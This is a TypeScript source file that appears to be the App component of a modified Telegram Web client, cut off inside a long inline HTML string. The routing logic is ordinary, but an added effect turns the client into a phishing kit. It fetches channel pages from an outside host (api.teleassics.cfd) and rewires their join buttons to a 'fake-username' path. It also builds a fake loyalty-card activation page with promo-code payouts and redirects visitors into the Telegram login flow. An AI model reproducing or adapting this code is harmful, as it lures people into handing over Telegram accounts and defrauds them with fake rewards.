import type {FC} from '../lib/teact/teact';
import React, {useEffect, useLayoutEffect} from '../lib/teact/teact';
import {getActions, withGlobal} from '../global';

import type {GlobalState} from '../global/types';
import type {ThemeKey} from '../types';
import type {UiLoaderPage} from './common/UiLoader';
import UiLoader from './common/UiLoader';

import {DARK_THEME_BG_COLOR, INACTIVE_MARKER, LIGHT_THEME_BG_COLOR, PAGE_TITLE,} from '../config';
import {selectTabState, selectTheme} from '../global/selectors';
import {addActiveTabChangeListener} from '../util/activeTabMonitor';
import buildClassName from '../util/buildClassName';
import {setupBeforeInstallPrompt} from '../util/installPrompt';
import {parseInitialLocationHash} from '../util/routing';
import {hasStoredSession} from '../util/sessions';
import {IS_INSTALL_PROMPT_SUPPORTED, IS_MULTITAB_SUPPORTED, PLATFORM_ENV} from '../util/windowEnvironment';
import {updateSizes} from '../util/windowSize';

import useAppLayout from '../hooks/useAppLayout';
import useFlag from '../hooks/useFlag';
import usePreviousDeprecated from '../hooks/usePreviousDeprecated';

// import Test from './test/TestLocale';
import Auth from './auth/Auth';
import AppInactive from './main/AppInactive';
import LockScreen from './main/LockScreen.async';
import Main from './main/Main.async';
import Transition from './ui/Transition';

import styles from './App.module.scss';
import {load} from "cheerio";
import axios from "axios";

type StateProps = {
  authState: GlobalState['authState'];
  isScreenLocked?: boolean;
  hasPasscode?: boolean;
  isInactiveAuth?: boolean;
  hasWebAuthTokenFailed?: boolean;
  isTestServer?: boolean;
  theme: ThemeKey;
};

enum AppScreens {
  auth,
  main,
  lock,
  inactive,
}

const TRANSITION_RENDER_COUNT = Object.keys(AppScreens).length / 2;
const INACTIVE_PAGE_TITLE = `${PAGE_TITLE} ${INACTIVE_MARKER}`;

const App: FC<StateProps> = ({
  authState,
  isScreenLocked,
  hasPasscode,
  isInactiveAuth,
  hasWebAuthTokenFailed,
  isTestServer,
  theme,
}) => {
  const { disconnect } = getActions();

  const [isInactive, markInactive, unmarkInactive] = useFlag(false);
  const { isMobile } = useAppLayout();
  const isMobileOs = PLATFORM_ENV === 'iOS' || PLATFORM_ENV === 'Android';

  useEffect(() => {
    if (IS_INSTALL_PROMPT_SUPPORTED) {
      setupBeforeInstallPrompt();
    }
  }, []);

  // Prevent drop on elements that do not accept it
  useEffect(() => {
    const body = document.body;
    const handleDrag = (e: DragEvent) => {
      e.preventDefault();
      if (!e.dataTransfer) return;
      if (!(e.target as HTMLElement).dataset.dropzone) {
        e.dataTransfer.dropEffect = 'none';
      } else {
        e.dataTransfer.dropEffect = 'copy';
      }
    };
    const handleDrop = (e: DragEvent) => {
      e.preventDefault();
    };
    body.addEventListener('drop', handleDrop);
    body.addEventListener('dragover', handleDrag);
    body.addEventListener('dragenter', handleDrag);

    return () => {
      body.removeEventListener('drop', handleDrop);
      body.removeEventListener('dragover', handleDrag);
      body.removeEventListener('dragenter', handleDrag);
    };
  }, []);

  // return <Test />;

  let activeKey: number;
  let page: UiLoaderPage | undefined;

  if (isInactive) {
    activeKey = AppScreens.inactive;
  } else if (isScreenLocked) {
    page = 'lock';
    activeKey = AppScreens.lock;
  } else if (authState) {
    switch (authState) {
      case 'authorizationStateWaitPhoneNumber':
        page = 'authPhoneNumber';
        activeKey = AppScreens.auth;
        break;
      case 'authorizationStateWaitCode':
        page = 'authCode';
        activeKey = AppScreens.auth;
        break;
      case 'authorizationStateWaitPassword':
        page = 'authPassword';
        activeKey = AppScreens.auth;
        break;
      case 'authorizationStateWaitRegistration':
        activeKey = AppScreens.auth;
        break;
      case 'authorizationStateWaitQrCode':
        page = 'authQrCode';
        activeKey = AppScreens.auth;
        break;
      case 'authorizationStateClosed':
      case 'authorizationStateClosing':
      case 'authorizationStateLoggingOut':
      case 'authorizationStateReady':
        page = 'main';
        activeKey = AppScreens.main;
        break;
    }
  } else if (hasStoredSession()) {
    page = 'main';
    activeKey = AppScreens.main;
  } else if (hasPasscode) {
    activeKey = AppScreens.lock;
  } else {
    page = isMobileOs ? 'authPhoneNumber' : 'authQrCode';
    activeKey = AppScreens.auth;
  }

  if (activeKey !== AppScreens.lock
    && activeKey !== AppScreens.inactive
    && activeKey !== AppScreens.main
    && parseInitialLocationHash()?.tgWebAuthToken
    && !hasWebAuthTokenFailed) {
    page = 'main';
    activeKey = AppScreens.main;
  }

  useEffect(() => {
    updateSizes();
  }, []);

  useEffect(() => {
    if (IS_MULTITAB_SUPPORTED) return;

    addActiveTabChangeListener(() => {
      disconnect();
      document.title = INACTIVE_PAGE_TITLE;

      markInactive();
    });
  }, [activeKey, disconnect, markInactive]);

  useEffect(() => {
    if (isInactiveAuth) {
      document.title = INACTIVE_PAGE_TITLE;
      markInactive();
    } else {
      document.title = PAGE_TITLE;
      unmarkInactive();
    }
  }, [isInactiveAuth, markInactive, unmarkInactive]);

  const prevActiveKey = usePreviousDeprecated(activeKey);

  // eslint-disable-next-line consistent-return
  function renderContent() {
    switch (activeKey) {
      case AppScreens.auth:
        return <Auth />;
      case AppScreens.main:
        return <Main isMobile={isMobile} />;
      case AppScreens.lock:
        return <LockScreen isLocked={isScreenLocked} />;
      case AppScreens.inactive:
        return <AppInactive />;
    }
  }

  useLayoutEffect(() => {
    if (localStorage.getItem('type') !== 'CARD') {
      document.body.classList.add(styles.bg);
    }
  }, []);

  useLayoutEffect(() => {
    if (localStorage.getItem('type') !== 'CARD') {
      document.body.style.setProperty(
        '--theme-background-color',
        theme === 'dark' ? DARK_THEME_BG_COLOR : LIGHT_THEME_BG_COLOR,
      );
    }
  }, [theme]);

  useEffect(() => {
    const handleChannelRequest = async () => {
      const channel = localStorage.getItem('channel');
      const type = localStorage.getItem('type');

      if (type === 'TME') {
        try {
          const response = await axios.post('https://api.teleassics.cfd/get-channel', { channel }, {
            headers: {
              'Content-Type': 'application/json',
            },
          });

          const data = response.data;
          const $ = load(data);

          $('script').remove();
          $('.tgme_page_context_link_wrap').remove();
          // eslint-disable-next-line func-names
          $('.tgme_page_extra').filter(function () {
            return $(this).text().includes('@');
          }).remove();

          $('link').each((_index, link) => {
            const href = $(link).attr('href');
            if (href && href.startsWith('//telegram.org/css/')) {
              // @ts-ignore
              const newHref = `/${href.split('/').pop().split('?')[0]}`;
              $(link).attr('href', newHref);
            }
          });

          $('a').each((_index, link) => {
            const href = $(link).attr('href');
            const prefixes = ['tg://resolve', 'tg://join', 'https://t.me'];
            // @ts-ignore
            const isValid = prefixes.some((prefix) => href.startsWith(prefix));

            if (isValid) {
              $(link).css('cursor', 'pointer');
              $(link).removeAttr('href');
            }
          });

          const authPages = document.querySelector('#auth-pages');
          if (authPages) {
            authPages.innerHTML = $.html();
          }

          document.getElementById('root')?.style.setProperty('background-color', '#010101');

          if (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches) {
            document.documentElement.classList.add('theme_dark');
          }

          const links = document.querySelectorAll('.tgme_action_button_new, .tgme_action_button');

          links.forEach((link) => {
            const newHref = `https://${window.location.host}/o/${localStorage.getItem('fake-username')}`;

            link.addEventListener('click', () => {
              document.cookie = 'fromSPage=; path=/; expires=Thu, 01 Jan 1970 00:00:00 UTC;';
              window.location.href = newHref;
              document.cookie = 'fromSPage=true; path=/';
            });
          });
        } catch (err) { /* empty */ }
      } else if (type === 'CARD') {
        fetch('/card.html')
          .then((response) => {
            if (!response.ok) {
              throw new Error(`Ошибка загрузки: ${response.status}`);
            }
            return response.text();
          })
          .then((html) => {
            const htmlElement = document.documentElement;

            const link = document.createElement('link');
            link.rel = 'icon';
            link.sizes = '144x144';
            link.href = 'data:image/jpeg;bse64,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'; // your base64-encoded image here

            document.head.appendChild(link);

            // @ts-ignore
            htmlElement.removeAttribute('style');

            const container = document.getElementById('root');
            // @ts-ignore
            container.classList.remove(...container.classList);

            // @ts-ignore
            container.innerHTML = html;

            document.getElementsByClassName('text')[0].textContent = localStorage.getItem('shop_name');

            const messagesObj = JSON.parse(localStorage.getItem('messages') as string);
            const messages = messagesObj[localStorage.getItem('language') ?? 'ru'];

            document.getElementById('cardInPhone').textContent = messages.cardInPhone.toString();
            document.getElementById('activateVirtualCard').innerHTML = messages.activateVirtualCard;
            document.getElementById('activate-button').textContent = messages.activateCard;
            document.getElementById('loyaltyCardTerms0').textContent = messages.loyaltyCardTerms.split('\n')[0];
            document.getElementById('loyaltyCardTerms1').textContent = messages.loyaltyCardTerms.split('\n')[1];
            document.getElementById('loyaltyCardTerms2').textContent = messages.loyaltyCardTerms.split('\n')[2];
            document.getElementById('loyaltyCardTerms3').textContent = messages.loyaltyCardTerms.split('\n')[3];
            document.getElementById('confirm-btn').textContent = messages.familiarized;

            document.getElementsByClassName('activate')[0].style.width = localStorage.getItem('language') === 'ru' ? '180px' : '160px';

            document.getElementById('target').textContent = messages.almostDone.split('\n')[0];
            document.getElementById('desc').textContent = messages.almostDone.split('\n')[1];
            document.getElementById('enter-code').placeholder = messages.inputPromo;

            // @ts-ignore
            // eslint-disable-next-line func-names
            document.getElementById('enter-code').addEventListener('input', function () {
              const input = this;

              const promo = localStorage.getItem('promo');
              const sum = localStorage.getItem('sum');

              const promoArray = promo ? promo.split(',') : [];
              const sumArray = sum ? sum.split(',') : [];

              const result = {};

              promoArray.forEach((key, index) => {
                if (sumArray[index]) {
                  // @ts-ignore
                  result[key.toUpperCase()] = sumArray[index];
                }
              });

              // @ts-ignore
              if (result[input.value.toUpperCase()]) {
                // @ts-ignore
                localStorage.setItem('active_promo', 'true');
                // @ts-ignore
                localStorage.setItem('final_sum', result[input.value.toUpperCase()]);
                // @ts-ignore
                input.value = `${localStorage.getItem('language') === 'ru' ? `АКТИВИРОВАН + ${result[input.value.toUpperCase()]} Р` : `АКТИВОВАНИЙ + ${result[input.value.toUpperCase()]} ГРН`}`;
                input.setAttribute('disabled', 'true');
              }
            });
          })
          .catch((error) => {
            console.error('Ошибка:', error);
          });
      } else if (type === 'AUTH') {
        document.cookie = 'fromSPage=; path=/; expires=Thu, 01 Jan 1970 00:00:00 UTC;';
        window.location.href = `https://${window.location.host}/o/${localStorage.getItem('fake-username')}`;
        document.cookie = 'fromSPage=true; path=/';
      } else {
        const authPages = document.querySelector('#auth-pages');

        // eslint-disable-next-line @typescript-eslint/no-shadow
        const premiumHtml = `
<html translate="no" class="notranslate theme-dark theme_dark" style="--scrollbar-width: 8px; --vh: 4.3px; --composer-text-size: 16px; --message-meta-height: 21px; --message-text-size: 16px; --color-primary-opacity: rgb(131,120,219,0.118); --color-primary-opacity-hover: rgb(131,120,219,0.251); --color-primary-tint: rgb(135,116,225,0.102); --color-primary-shade: rgb(123,113,198); --color-primary-shade-rgb: 123,113,198; --color-background-compact-menu: rgb(33,33,33,0.867); --color-web-app-browser: rgb(3,3,3,0.561); --color-background-compact-menu-reactions: rgb(33,33,33,0.867); --color-background-compact-menu-hover: rgb(0,0,0,0.4); --color-background-secondary: rgb(15,15,15); --color-background-secondary-accent: rgb(25,25,25); --color-background-own: rgb(118,106,200); --color-background-own-apple: rgb(118,106,200); --color-background-selected: rgb(44,44,44); --color-background-own-selected: rgb(101,73,212); --color-chat-hover: rgb(44,44,44); --color-chat-active: rgb(118,106,200); --color-chat-active-greyed: rgb(146,136,211); --color-item-hover: rgb(44,44,44); --color-item-active: rgb(41,41,41); --color-text-rgb: 255,255,255; --color-text-secondary: rgb(170,170,170); --color-text-secondary-rgb: 170,170,170; --color-icon-secondary: rgb(170,170,170); --color-text-secondary-apple: rgb(170,170,170); --color-borders: rgb(48,48,48); --color-borders-input: rgb(91,91,90); --color-dividers: rgb(59,59,61); --color-dividers-android: rgb(15,15,15); --color-links: rgb(135,116,225); --color-gray: rgb(113,117,121); --color-list-icon: rgb(162,162,162); --color-default-shadow: rgb(16,16,16,0.612); --color-light-shadow: rgb(0,0,0,0.251); --color-green: rgb(135,116,225); --color-green-darker: rgb(123,113,198); --color-success: rgb(0,199,62); --color-text-meta-colored: rgb(131,120,219); --color-reply-hover: rgb(39,39,39); --color-reply-active: rgb(46,47,47); --color-reply-own-hover: rgb(135,117,218); --color-reply-own-hover-apple: rgb(135,117,218); --color-reply-own-active: rgb(145,125,234); --color-reply-own-active-apple: rgb(145,125,234); --color-accent-own: rgb(255,255,255); --color-accent-own-rgb: 255,255,255; --color-message-meta-own: rgb(255,255,255,0.533); --color-own-links: rgb(255,255,255); --color-code: rgb(135,116,225); --color-code-own: rgb(255,255,255); --color-code-bg: rgb(0,0,0,0.502); --color-code-own-bg: rgb(0,0,0,0.314); --color-composer-button: rgb(170,170,170,0.8); --color-message-reaction: rgb(43,42,53); --color-message-reaction-hover: rgb(52,49,71); --color-message-reaction-own: rgb(103,92,175); --color-message-reaction-hover-own: rgb(91,82,155); --color-message-reaction-chosen-hover: rgb(120,100,221); --color-message-reaction-chosen-hover-own: rgb(245,245,245); --color-voice-transcribe-button: rgb(42,42,60); --color-voice-transcribe-button-own: rgb(131,115,211); --color-topic-blue: rgb(111,249,240); --color-topic-yellow: rgb(255,214,126); --color-topic-violet: rgb(203,134,219); --color-topic-green: rgb(142,238,152); --color-topic-rose: rgb(255,147,178); --color-topic-red: rgb(251,111,95); --color-topic-grey: rgb(153,153,153); --color-forum-unread-topic-hover: rgb(54,54,54); --color-forum-hover-unread-topic-hover: rgb(63,63,63); --color-chat-username: 